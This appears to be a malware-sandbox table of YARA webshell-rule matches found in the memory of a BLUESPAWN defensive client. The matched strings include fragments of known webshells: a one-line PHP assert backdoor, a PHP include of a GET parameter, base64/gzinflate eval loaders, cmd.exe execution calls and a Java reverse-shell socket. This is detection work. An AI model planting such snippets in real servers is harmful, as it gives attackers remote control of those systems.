| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_dabao | Web Shell - file dabao.asp | Florian Roth | - 0x2e1a4d:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x3430fa:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x2e1aa6:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
- 0x343149:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_2 | Web Shell - file 2.php | Florian Roth | - 0x2e1c20:$s0: <?php assert($_REQUEST["c"]);?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_cmdasp | Web Shell - file cmdasp.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6463:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_spjspshell | Web Shell - file spjspshell.jsp | Florian Roth | - 0x2e1f56:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
- 0x343463:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_action | Web Shell - file action.jsp | Florian Roth | - 0x2e20e1:$s1: String url="jdbc:oracle:thin:@localhost:1521:orcl";
- 0x2e2121:$s6: <%@ page contentType="text/html;charset=gb2312"%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Inderxer | Web Shell - file Inderxer.asp | Florian Roth | - 0x2e2291:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f906c:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3174d4:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x34368c:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3533ac:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x369616:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_Rader | Web Shell - file Rader.asp | Florian Roth | - 0x2e241a:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x343791:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x2e2477:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
- 0x3437e4:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_madnet_smowu | Web Shell - file smowu.php | Florian Roth | - 0x2e2609:$s0: //Authentication
- 0x307ef6:$s0: //Authentication
- 0x309cdc:$s0: //Authentication
- 0x2e2626:$s1: $login = "
- 0x309cbb:$s1: $login = "
- 0x2e121b:$s2: eval(gzinflate(base64_decode('
- 0x2e263d:$s2: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s2: eval(gzinflate(base64_decode('
- 0x2f54c3:$s2: eval(gzinflate(base64_decode('
- 0x307e75:$s2: eval(gzinflate(base64_decode('
- 0x309c70:$s2: eval(gzinflate(base64_decode('
- 0x342b7a:$s2: eval(gzinflate(base64_decode('
- 0x343912:$s2: eval(gzinflate(base64_decode('
- 0x34f3cd:$s2: eval(gzinflate(base64_decode('
- 0x3506b7:$s2: eval(gzinflate(base64_decode('
- 0x35e30e:$s2: eval(gzinflate(base64_decode('
- 0x35f97f:$s2: eval(gzinflate(base64_decode('
- 0x2e2668:$s4: //Pass
- 0x307eb1:$s4: //Pass
- 0x309ca8:$s4: //Pass
- 0x343933:$s4: //Pass
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_moon | Web Shell - file moon.php | Florian Roth | - 0x2e27e6:$s2: echo '<option value="create function backshell returns string soname
- 0x343a19:$s2: echo '<option value="create function backshell returns string soname
- 0x2e2837:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x343a60:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x2e288f:$s8: echo '<option value="select cmdshell(\'net user
- 0x343aae:$s8: echo '<option value="select cmdshell(\'net user
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_jdbc | Web Shell - file jdbc.jsp | Florian Roth | - 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_minupload | Web Shell - file minupload.jsp | Florian Roth | - 0x2db299:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x2e2b86:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x2d5d3b:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2db243:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2dfe50:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2e2bcb:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x33b0f8:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x33ea6b:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x341df0:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x343cd8:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ELMALISEKER_Backd00r | Web Shell - file ELMALISEKER Backd00r.asp | Florian Roth | - 0x2e2d68:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x343df1:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x2e2dc4:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
- 0x343e43:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_bug_1_ | Web Shell - file bug (1).php | Florian Roth | - 0x2e2f4e:$s0: @include($_GET['bug']);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_hkmjj | Web Shell - file hkmjj.asp | Florian Roth | - 0x2e30ab:$s6: codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_asd | Web Shell - file asd.jsp | Florian Roth | - 0x2d8914:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e09d0:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e3226:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e3260:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
- 0x344149:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_inback3 | Web Shell - file inback3.jsp | Florian Roth | - 0x2de3de:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x2e33e7:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x340bb2:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x34424c:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_metaslsoft | Web Shell - file metaslsoft.php | Florian Roth | - 0x2e3578:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
- 0x344359:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_Ajan | Web Shell - file Ajan.asp | Florian Roth | - 0x2e36fc:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
- 0x344459:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_config_myxx_zend | Web Shell - from files config.jsp, myxx.jsp, zend.jsp | Florian Roth | - 0x2e394c:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
- 0x3445d3:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_ma_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x2e3c39:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x3447b6:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x2e3c7c:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
- 0x3447ef:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_itsec_itsecteam_shell_jHn | Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2e3ee0:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x34497d:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x2e3f3a:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
- 0x3449cd:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ghost_source_icesword_silic | Web Shell - from files ghost_source.php, icesword.php, silic.php | Florian Roth | - 0x2e41a5:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x344b62:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x2e4202:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
- 0x344bb5:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e4acd:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x345106:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x2e4b1c:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
- 0x34514b:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2e4e3a:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x345345:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x2e4e91:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
- 0x345392:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e582a:$s0: ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
- 0x2e5878:$s1: private static class VEditPropertyInvoker extends DefaultInvoker {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_wso2_5_1_wso2_5_wso2 | Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php | Florian Roth | - 0x2e5ac8:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x345b21:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x2e5b23:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
- 0x345b72:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_queryDong_spyjsp2010_t00ls | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp | Florian Roth | - 0x2e5e69:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x345d94:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x2e5eba:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
- 0x345ddb:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_suiyue | Web Shell - from files 404.jsp, data.jsp, suiyue.jsp | Florian Roth | - 0x2e60ff:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
- 0x345f4a:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx | Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2e650f:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x3461ce:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x2e6568:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x34621d:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x2e65c1:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
- 0x34626c:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_807_a_css_dm_he1p_JspSpy_xxx | Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e6ce8:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x3466b5:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x2e6d36:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x3466f9:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x2e6d90:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
- 0x346749:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_201_3_ma_download | Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x2e7023:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x3468ec:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x2e707d:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x34693c:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x2e70d5:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
- 0x34698a:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp | Florian Roth | - 0x2e75b0:$s4: UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
- 0x2e75f5:$s5: long time = (System.currentTimeMillis() - starttime) / 1000l;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2006_arabicspy | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php | Florian Roth | - 0x2e784e:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x346e49:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x2e78ab:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
- 0x346e9c:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_in_JFolder_jfolder01_jsp_leo_warn | Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp | Florian Roth | - 0x2e7be6:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x3470b3:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x2e7c3f:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
- 0x347102:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_icesword_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2e7fb9:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x34733e:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x2e800c:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x347387:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x2e805b:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
- 0x3473cc:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php | Florian Roth | - 0x2e82de:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x315e01:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x347579:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x368622:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x2e832e:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x3475bf:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x2e8387:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
- 0x34760e:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2e863f:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d5f5:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x3477d6:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x362514:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files c99.php, Shell [ci | unknown | - 0x2e8937:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
- 0x3479aa:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2008_2009lite_2009mssql | Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php | Florian Roth | - 0x2e8b93:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x347b30:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x2e8bd1:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
- 0x347b64:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz | Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php | Florian Roth | - 0x2e8f32:$s0: $mainpath_info = explode('/', $mainpath);
- 0x2e8f72:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
- 0x347dbd:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_807_dm_JspSpyJDK5_m_cofigrue | Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp | Florian Roth | - 0x2e9267:$s1: url_con.setRequestProperty("REFERER", ""+fckal+"");
- 0x2e92a7:$s9: FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx | Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php | Florian Roth | - 0x2e94e1:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x348142:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x2e953a:$s9: if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_in_JFolder_jfolder01_xxx | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2e98e0:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
- 0x3483c5:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_reverse_jsp_reverse_jspbd | Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp | Florian Roth | - 0x2e9b4a:$s0: osw = new BufferedWriter(new OutputStreamWriter(os));
- 0x2e9b8c:$s7: sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- 0x2e9bd8:$s9: isr = new BufferedReader(new InputStreamReader(is));
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc | Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp | Florian Roth | - 0x2e9fa8:$s0: sbFolder.append("<tr><td > </td><td>");
- 0x2e9fe1:$s1: return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
- 0x2ea031:$s5: FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
- 0x2ea06f:$s6: <input type="hidden" name="cmd" value="<%=strCmd%>">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2ea3df:$s1: while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
- 0x2ea427:$s6: password = (String)session.getAttribute("password");
- 0x308441:$s6: password = (String)session.getAttribute("password");
- 0x2ea468:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
- 0x348b9b:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx | Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2eacb6:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x301068:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3490dd:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3591db:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x2ead13:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
- 0x349131:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
|
